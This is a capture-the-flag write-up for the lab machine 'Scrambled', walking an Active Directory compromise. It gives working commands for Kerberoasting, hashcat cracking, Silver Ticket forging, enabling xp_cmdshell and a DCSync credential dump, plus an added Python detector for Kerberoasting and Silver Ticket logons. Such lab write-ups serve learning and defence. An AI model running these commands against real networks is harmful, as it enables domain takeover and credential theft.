Scrambled
IP: 10.10.11.168 | Domain: scrm.local | DC: dc1.scrm.local
Environment Setup
export IP=10.10.11.168
export VPN=$(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1)
echo "10.10.11.168 scrm.local dc1.scrm.local" >> /etc/hosts
Step 1 — Port Scanning
Why: NTLM authentication is disabled on this machine — a rare but increasingly recommended hardening step. This forces all authentication through Kerberos and eliminates password-spraying via NTLM. All tooling must switch to Kerberos mode, which complicates the attack chain significantly.
nmap -sCV -p- --min-rate 5000 $IP -oN nmap.out
Output:
PORT STATE SERVICE
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
4411/tcp open found on some ports
5985/tcp open wsman
Key findings:
- MSSQL (1433) open alongside AD ports — SQL Server on a DC is a significant attack vector
- HTTP (80) — potential user enumeration or credential hints
- NTLM disabled — confirmed from web notice, all auth must be Kerberos
Step 2 — Web Enumeration → Username Discovery
Why: The web server hosts an intranet page announcing that NTLM auth is disabled. More critically, a password reset notice reveals a username in plaintext. Combined with Kerberos user enumeration, this gives the first foothold.
curl http://$IP/
# Enumerate web pages for usernames and password reset instructions
Key findings:
- Web page reveals: user ksimpson had their password reset to their username
- Classic helpdesk misconfiguration — temporary password equals username, never changed
Step 3 — Kerberos Authentication as ksimpson
Why: With NTLM disabled, all auth goes through Kerberos. ksimpson:ksimpson is the credential hint from the web page. Kerberos TGT request confirms validity without making noisy NTLM attempts.
getTGT.py scrm.local/ksimpson:ksimpson -dc-ip $IP
export KRB5CCNAME=ksimpson.ccache
Key findings:
- ksimpson:ksimpson valid — TGT obtained
- Kerberos-only environment means all tools need -k -no-pass flags
Step 4 — Kerberoasting
Why: Any authenticated domain user can request TGS tickets for SPNs. The ticket is encrypted with the service account's hash — making it offline-crackable. In a Kerberos-only environment, impacket's GetUserSPNs.py must use the existing TGT.
GetUserSPNs.py -k -no-pass scrm.local/ksimpson -dc-host dc1.scrm.local -request
Output:
ServicePrincipalName Name MemberOf
----------------------------- --------- --------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$...*<REDACTED_HASH>
Key findings:
- sqlsvc service account is Kerberoastable — SPN: MSSQLSvc/dc1.scrm.local:1433
- RC4-HMAC hash (type 23) — fast to crack with hashcat
Step 5 — Hash Cracking
Why: RC4-HMAC TGS-REP hashes (mode 13100) are among the fastest Kerberos hash types. Rockyou catches common service account passwords immediately.
hashcat -m 13100 sqlsvc.hash /usr/share/wordlists/rockyou.txt
Output:
$krb5tgs$23$*sqlsvc$...*<REDACTED_HASH>:<REDACTED>
Key findings:
- sqlsvc:<REDACTED> cracked — service account password recovered
Step 6 — Silver Ticket — MSSQL Access
Why: With the sqlsvc NTLM hash (derived from the cracked password), a Silver Ticket can be forged for MSSQLSvc/dc1.scrm.local:1433. Silver Tickets bypass the KDC entirely — no TGT request logged. The ticket grants direct service access as any user, including Administrator.
# Get sqlsvc NTLM hash from password (NT hash = MD4 over the UTF-16LE password;
# md4 needs the OpenSSL legacy provider on Python builds linked against OpenSSL 3)
python3 -c "import hashlib; print(hashlib.new('md4', '<REDACTED>'.encode('utf-16le')).hexdigest())"
# Forge Silver Ticket
ticketer.py -nthash <REDACTED_NTLM> -domain-sid <DOMAIN_SID> -domain scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 Administrator
export KRB5CCNAME=Administrator.ccache
# Connect to MSSQL
mssqlclient.py -k dc1.scrm.local
Key findings:
- Silver Ticket forged as Administrator for MSSQL service
- Direct MSSQL access without touching the KDC — no TGT/TGS request is logged by the KDC, although the service logon itself is still recorded on the host
- xp_cmdshell likely available for code execution
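Both Kerberos abuses in this chain leave a footprint in the DC's Security log: Kerberoasting (Step 4) appears as 4769 TGS requests with RC4 (etype 0x17) for user-account SPNs, and a Silver Ticket (Step 6) appears as a Kerberos logon for which the KDC never issued a ticket. The following Python is an added detection example, not part of this writeup; the event records, their simplified field names and the client address 10.10.14.5 are constructed assumptions, not captured data.

```python
"""Detection checks for Kerberoasting and Silver Ticket use (added example).
Events are constructed to resemble Windows Security log fields; the schema
is simplified (real 4769/4624 events carry more fields and different names)."""
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23: the ticket type hashcat mode 13100 cracks

# Constructed sample events. 4769 = TGS request (logged by the KDC),
# 4624 = logon on the host that consumed the service ticket. 10.10.14.5 is an
# assumed client address. ts = seconds, kept small for readability.
EVENTS = [
    {"id": 4769, "user": "ksimpson@SCRM.LOCAL", "service": "sqlsvc",
     "etype": "0x17", "ip": "10.10.14.5", "ts": 100},
    {"id": 4769, "user": "ksimpson@SCRM.LOCAL", "service": "DC1$",
     "etype": "0x12", "ip": "10.10.14.5", "ts": 101},
    {"id": 4624, "user": "Administrator", "logon_type": 3, "auth": "Kerberos",
     "ip": "10.10.14.5", "ts": 300},
    {"id": 4624, "user": "ksimpson", "logon_type": 3, "auth": "Kerberos",
     "ip": "10.10.14.5", "ts": 302},
]


def kerberoast_candidates(events):
    """4769 requests for non-machine accounts with RC4 encryption.
    Modern clients negotiate AES, so an RC4 ticket for a user-account SPN
    (here sqlsvc) is the classic Kerberoast signal; a burst of them from one
    client for many SPNs raises confidence further."""
    return [(e["user"], e["service"], e["ip"]) for e in events
            if e["id"] == 4769 and e["etype"] == RC4_HMAC
            and not e["service"].endswith("$")]


def silver_ticket_candidates(events, window=3600):
    """Kerberos network logons (4624) with no 4769 for the same user and
    client within `window` seconds. A forged ticket never touches the KDC,
    so the missing issuance is its footprint on the DC."""
    issued = defaultdict(list)
    for e in events:
        if e["id"] == 4769:
            issued[(e["user"].split("@")[0].lower(), e["ip"])].append(e["ts"])
    hits = []
    for e in events:
        if e["id"] == 4624 and e["auth"] == "Kerberos" and e["logon_type"] == 3:
            key = (e["user"].lower(), e["ip"])
            if not any(0 <= e["ts"] - t <= window for t in issued[key]):
                hits.append((e["user"], e["ip"]))
    return hits
```

In production the correlation runs across the DC's 4769 stream and the service host's 4624 stream; here both are in one list because the MSSQL host is the DC itself.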
Step 7 — MSSQL Code Execution → Shell
Why: xp_cmdshell in MSSQL runs OS commands as the SQL service account. Even if disabled, it can be re-enabled with sp_configure when running as a privileged SQL user. This gives command execution on the DC.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Output:
scrm\sqlsvc
Key findings:
- RCE as scrm\sqlsvc via MSSQL
- Upload reverse shell or Certify/Rubeus for next step
Step 8 — Privilege Escalation via MSSQL CLR Assembly
Why: MSSQL CLR (Common Language Runtime) assemblies allow loading custom .NET DLLs directly into SQL Server and executing them as the service account. The sqlsvc account has SeImpersonatePrivilege, which, combined with CLR, gives SYSTEM-level access.
-- Load CLR assembly for OS command execution as SYSTEM
-- Escalate to NT AUTHORITY\SYSTEM via token impersonation
Key findings:
- SeImpersonatePrivilege abused via MSSQL CLR → SYSTEM shell on DC
- Dump NTDS or run DCSync for Domain Admin hash
Step 9 — DCSync → Domain Admin
Why: With SYSTEM on the DC, extracting the NTDS.dit or performing a DCSync gives every domain account hash. Pass-the-hash with the Administrator NTLM completes the compromise.
secretsdump.py -k -no-pass scrm.local/Administrator@dc1.scrm.local
Output:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED_NTLM>:::
Key findings:
- Administrator NTLM hash extracted
- Pass-the-hash not possible (NTLM disabled) — use the hash with Silver Ticket or crack for plaintext
🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED
Credentials
ksimpson:<REDACTED> # Username = password (web hint)
sqlsvc:<REDACTED> # Kerberoast → hashcat
Administrator:<REDACTED> # DCSync NTLM hash
Full Attack Chain
Web enumeration → ksimpson:ksimpson (password reset hint)
└─ Kerberoast (Kerberos-only) → sqlsvc TGS hash
└─ hashcat (rockyou) → sqlsvc:<REDACTED>
└─ Silver Ticket (MSSQLSvc) → MSSQL as Administrator
└─ xp_cmdshell → RCE as sqlsvc
└─ CLR assembly + SeImpersonatePrivilege → SYSTEM
└─ DCSync → Administrator NTLM hash
🏴 DOMAIN ADMIN
© 0xNRG — Scrambled pwned